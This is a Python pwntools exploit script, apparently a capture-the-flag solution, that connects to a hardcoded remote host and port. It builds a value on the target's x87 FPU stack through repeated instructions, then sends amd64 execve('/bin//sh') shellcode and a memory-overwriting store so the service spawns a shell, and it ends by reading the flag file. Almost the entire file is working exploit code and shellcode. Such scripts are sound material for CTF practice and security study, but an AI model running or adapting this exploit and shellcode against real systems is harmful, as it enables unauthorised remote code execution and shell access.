from pwn import * | |
# padding; push 0; ret
# Integer value that the x87 sequence below builds up on the remote FPU stack;
# its five little-endian bytes are exactly this literal.
TARGET = int.from_bytes(b'\x00\x00\x6a\x00\xc3', byteorder='little')
# Byte string waited for (via sendlineafter) before each line is sent.
PROMPT = b': '
# amd64 assembly text; assembled with pwntools `asm` in the final send below.
SHELLCODE = r'''
xor eax, eax
xor rdx, rdx
xor rsi, rsi
movabs rbx, 0x68732f2f6e69622f
push rbx
push rsp
pop rdi
mov al, 0x3b
syscall
'''
# Pure network I/O from here on; the context manager closes the connection on exit.
with remote('3.38.149.80', 20001) as tube:
    def run_x87(cmd):
        """Send `cmd` (raw instruction bytes) prefixed by two 0x90 bytes, hex-encoded, after PROMPT.

        Returns None; the remote side's response is not read here.
        """
        full_cmd = flat(b'\x90\x90', cmd)
        tube.sendlineafter(PROMPT, full_cmd.hex().encode())
    # Single-instruction helpers; the opcode bytes are the x87 instructions named in the comments.
    load_one = lambda: run_x87(b'\xd9\xe8') # fld1
    double = lambda: run_x87(b'\xd8\xc0') # fadd st0, st0
    add_one = lambda: run_x87(b'\xd8\xc1') # fadd st0, st1
    # Push 1.0 twice: st0 is the accumulator, st1 stays 1.0 so add_one() adds exactly one.
    load_one()
    load_one()
    # Horner-style build of TARGET in st0: the initial 1.0 is its top bit; for each
    # remaining bit (high to low) shift by doubling, then add one when the bit is set.
    for bit in range(TARGET.bit_length() - 2, -1, -1):
        double()
        if TARGET & (1 << bit):
            add_one()
    # Final line: the assembled SHELLCODE bytes followed by `fistp qword ptr [rax]`,
    # which stores st0 (now TARGET) as a 64-bit integer at the address held in rax.
    tube.sendlineafter(PROMPT, flat(
        asm(SHELLCODE, arch='amd64'),
        b'\xdf\x38' # fistp qword ptr [rax]
    ).hex().encode())
    tube.sendline(b'cat flag')
    print(tube.recvline())